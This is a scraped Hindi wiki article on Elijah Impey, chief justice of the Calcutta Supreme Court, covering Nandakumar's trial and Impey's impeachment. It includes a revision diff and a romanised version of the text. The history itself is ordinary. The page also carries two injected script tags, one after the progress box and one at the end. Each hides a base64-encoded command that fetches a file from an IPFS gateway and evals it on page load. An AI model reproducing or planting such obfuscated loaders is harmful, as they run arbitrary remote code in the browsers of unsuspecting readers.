Difference between revisions of "एलिजा इम्पी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "कार्यवाही" to "कार्रवाई")
 
(6 intermediate revisions by 4 users not shown)
Line 1: Line 1:
*एलिजा इम्पी वेस्टमिनिस्टर में शिक्षा तथा गवर्नर-जनरल [[वारेन हेस्टिंग्स]] का सहपाठी था।  
+
'''एलिजा इम्पी''' (1732-1809 ई.) वेस्टमिनिस्टर में शिक्षा तथा [[गवर्नर-जनरल]] [[वारेन हेस्टिंग्स]] का सहपाठी था। इम्पी 1773 ई. के [[रेग्युलेटिंग एक्ट]] द्वारा [[कोलकाता|कलकत्ता]] के सुप्रीम कोर्ट का मुख्य न्यायाधीश नियुक्त किया गया और 1774 ई. में कलकत्ता पहुँचा। 1775 ई. में एलिजा इम्पी की अध्यक्षता में ही [[नंदकुमार]] के मुक़दमे की सुनवाई हुई थी।
*एलिजा इम्पी 1773 ई. के [[रेग्युलेटिंग एक्ट]] द्वारा [[कोलकाता|कलकत्ता]] के सुप्रीम कोर्ट का मुख्य न्यायाधीश नियुक्त किया गया और 1774 ई. में कलकत्ता पहुँचा।  
+
*1775 ई. में एलिजा इम्पी की अध्यक्षता में नंदकुमार के मुक़दमे की सुनवाई हुई।
+
*एलिजा इम्पी ने जालसाज़ी के अभियोग में नंदकुमार को फ़ाँसी की सज़ा दी।  
*एलिजा इम्पी ने जालसाज़ी के अभियोग में उसे फ़ाँसी की सज़ा दी।  
 
 
*बहुत से लोगों का विचार है कि इस मुक़दमें में वारेन हेस्टिंग्स की मित्रता ने इम्पी को प्रभावित किया।  
 
*बहुत से लोगों का विचार है कि इस मुक़दमें में वारेन हेस्टिंग्स की मित्रता ने इम्पी को प्रभावित किया।  
 
*1777 ई. में वारेन हेस्टिंग्स के कथित इस्तीफ़े पर भी एलिजा इम्पी ने उसके पक्ष में ही निर्णय दिया।  
 
*1777 ई. में वारेन हेस्टिंग्स के कथित इस्तीफ़े पर भी एलिजा इम्पी ने उसके पक्ष में ही निर्णय दिया।  
*एलिजा इम्पी ने वारेन हेस्टिंग्स के विरोधी, फ़िलिप फ़्राँसिस को भी ग्रांड कांड में 50,000 रुपये हर्जाना देने का निर्णय दिया।  
+
*एलिजा इम्पी ने वारेन हेस्टिंग्स के विरोधी, [[सर फ़िलिप फ़्राँसिस]] को भी ग्रांड कांड में 50,000 रुपये हर्जाना देने का निर्णय दिया।  
*एलिजा इम्पी के नेतृत्व में 1779 ई. में सुप्रीम कोर्ट ने अपने अधिकार क्षेत्र के प्रश्न पर कौंसिल से झगड़ा करना शुरू कर दिया। जो उसकी प्रतिष्ठा को गिराने वाला था।  
+
*इम्पी के नेतृत्व में 1779 ई. में सुप्रीम कोर्ट ने अपने अधिकार क्षेत्र के प्रश्न पर कौंसिल से झगड़ा करना शुरू कर दिया। जो उसकी प्रतिष्ठा को गिराने वाला था।  
*वारेन हेस्टिंग्स ने जैसे ही उसे मुख्य न्यायाधीश के रूप में मिलने वाले 8000 पौंड वार्षिक वेतन के अतिरिक्त 6000 पौंड वार्षिक वेतन पर सदर दीवानी अदालत का अध्यक्ष नियुक्त कर दिया, यह झगड़ा समाप्त हो गया।  
+
*वारेन हेस्टिंग्स ने जैसे ही उसे मुख्य न्यायाधीश के रूप में मिलने वाले 8000 पौंड वार्षिक वेतन के अतिरिक्त 6000 पौंड वार्षिक वेतन पर [[सदर दीवानी अदालत]] का अध्यक्ष नियुक्त कर दिया, यह झगड़ा समाप्त हो गया।  
*पार्लियामेंट ने इस सारी कार्यवाही को अत्यन्त अनियमित ठहराया और 1782 ई. में इम्पी को वापस बुला लिया।  
+
*पार्लियामेंट ने इस सारी कार्रवाई को अत्यन्त अनियमित ठहराया और 1782 ई. में इम्पी को वापस बुला लिया। उसके विरुद्ध महाभियोग भी चलाया गया।
*उसके विरुद्ध महाभियोग चलाने की कोशिशें की गयीं।
+
*इम्पी पर जो महाभियोग चलाया गया, उसमें से [[कांसीजोड़ा कांड]] भी इसके लिये ज़िम्मेदार था।
*एलिजा इम्पी ने पार्लियामेंट के समक्ष अपनी सफाई पेश की और महाभियोग की कार्यवाही को समाप्त कर दिया।  
+
*एलिजा इम्पी ने पार्लियामेंट के समक्ष अपनी सफाई पेश की और महाभियोग की कार्रवाई को समाप्त कर दिया।  
*एलिजा इम्पी 1790 ई. में पार्लियामेंट का सदस्य चुना गया और 1796 ई. तक सदस्य रहा।
+
*1790 ई. में एलिजा इम्पी पार्लियामेंट का सदस्य चुना गया और 1796 ई. तक सदस्य रहा।<ref>पुस्तक 'भारतीय इतिहास कोश' पृष्ठ संख्या-53</ref>
  
{{प्रचार}}
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
{{लेख प्रगति
 
|आधार=
 
|प्रारम्भिक=प्रारम्भिक1
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
Line 29: Line 20:
 
[[Category:अंग्रेज़ी शासन]]  
 
[[Category:अंग्रेज़ी शासन]]  
 
[[Category:इतिहास_कोश]]
 
[[Category:इतिहास_कोश]]
[[Category:नया पन्ना]]
 
 
__INDEX__
 
__INDEX__

Latest revision as of 09:01, 10 February 2021

elija impi (1732-1809 ee.) vestaministar mean shiksha tatha gavarnar-janaral varen hestiangs ka sahapathi tha. impi 1773 ee. ke regyuletiang ekt dvara kalakatta ke suprim kort ka mukhy nyayadhish niyukt kiya gaya aur 1774 ee. mean kalakatta pahuancha. 1775 ee. mean elija impi ki adhyakshata mean hi nandakumar ke muqadame ki sunavaee huee thi.

  • elija impi ne jalasazi ke abhiyog mean nandakumar ko faansi ki saza di.
  • bahut se logoan ka vichar hai ki is muqadamean mean varen hestiangs ki mitrata ne impi ko prabhavit kiya.
  • 1777 ee. mean varen hestiangs ke kathit istife par bhi elija impi ne usake paksh mean hi nirnay diya.
  • elija impi ne varen hestiangs ke virodhi, sar filip fraansis ko bhi graand kaand mean 50,000 rupaye harjana dene ka nirnay diya.
  • impi ke netritv mean 1779 ee. mean suprim kort ne apane adhikar kshetr ke prashn par kauansil se jhag da karana shuroo kar diya. jo usaki pratishtha ko girane vala tha.
  • varen hestiangs ne jaise hi use mukhy nyayadhish ke roop mean milane vale 8000 pauand varshik vetan ke atirikt 6000 pauand varshik vetan par sadar divani adalat ka adhyaksh niyukt kar diya, yah jhag da samapt ho gaya.
  • parliyameant ne is sari karravaee ko atyant aniyamit thaharaya aur 1782 ee. mean impi ko vapas bula liya. usake viruddh mahabhiyog bhi chalaya gaya.
  • impi par jo mahabhiyog chalaya gaya, usamean se kaansijo da kaand bhi isake liye zimmedar tha.
  • elija impi ne parliyameant ke samaksh apani saphaee pesh ki aur mahabhiyog ki karravaee ko samapt kar diya.
  • 1790 ee. mean elija impi parliyameant ka sadasy chuna gaya aur 1796 ee. tak sadasy raha.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. pustak 'bharatiy itihas kosh' prishth sankhya-53

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>